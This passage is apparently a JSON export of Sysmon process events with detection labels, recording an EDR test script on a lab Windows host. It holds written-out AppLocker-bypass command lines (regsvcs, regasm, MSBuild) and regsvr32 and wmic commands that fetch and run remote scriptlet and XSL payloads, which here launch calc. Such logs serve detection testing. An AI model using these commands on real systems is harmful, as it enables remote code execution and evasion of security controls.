21:33:23.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4912,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:23.507565Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" 
","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ProcessId":1296,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4916,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:28.250664Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001062788800","ProcessId":2040,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4917,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:28.374373Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ParentProcessId":1296,"ProcessGuid":"747F3D96-6628-5D3F-0000-00105B918800","ProcessId":4860,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:28.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4918,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.341503Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010B1968800","ProcessId":5708,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:28.756"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4919,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.565736Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010349B8800","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:28.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4920,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.646278Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-001011038900","ProcessId":6020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:34.216"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4922,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:34.295068Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-0010C2048900","ProcessId":1976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:34.234"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4923,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:34.411034Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ProcessId":4092,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:39.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4925,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.312305Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001092628900","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:39.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4926,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.358048Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ParentProcessId":4092,"ProcessGuid":"747F3D96-6633-5D3F-0000-0010D9778900","ProcessId":3512,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:39.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4928,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.907321Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-00103DA88900","ParentProcessId":1652,"ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:44.622"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4931,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:44.641177Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-29 21:33:44.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4932,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:44.819320Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without 
DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ParentProcessId":4288,"ProcessGuid":"747F3D96-6639-5D3F-0000-001074F48900","ProcessId":208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:45.332"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4933,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:45.581170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ProcessId":3240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.535"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4936,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:49.748805Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"MSBuild.exe","FileVersion":"4.7.3190.0 built by: 
NET472REL1LAST_C","Hashes":"SHA1=9672CADE96C657A8860D60923AFDBE4C46A2935D,MD5=4D7D4D92DC7D86B72ABF81821FF83837,SHA256=B60EB62F6C24D4A495A0DAB95CC49624AC5099A2CC21F8BD010A410401AB8CC3,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ParentProcessId":3240,"ProcessGuid":"747F3D96-663D-5D3F-0000-001062708A00","ProcessId":5340,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.881"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4938,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:50.104868Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","Company":"Microsoft 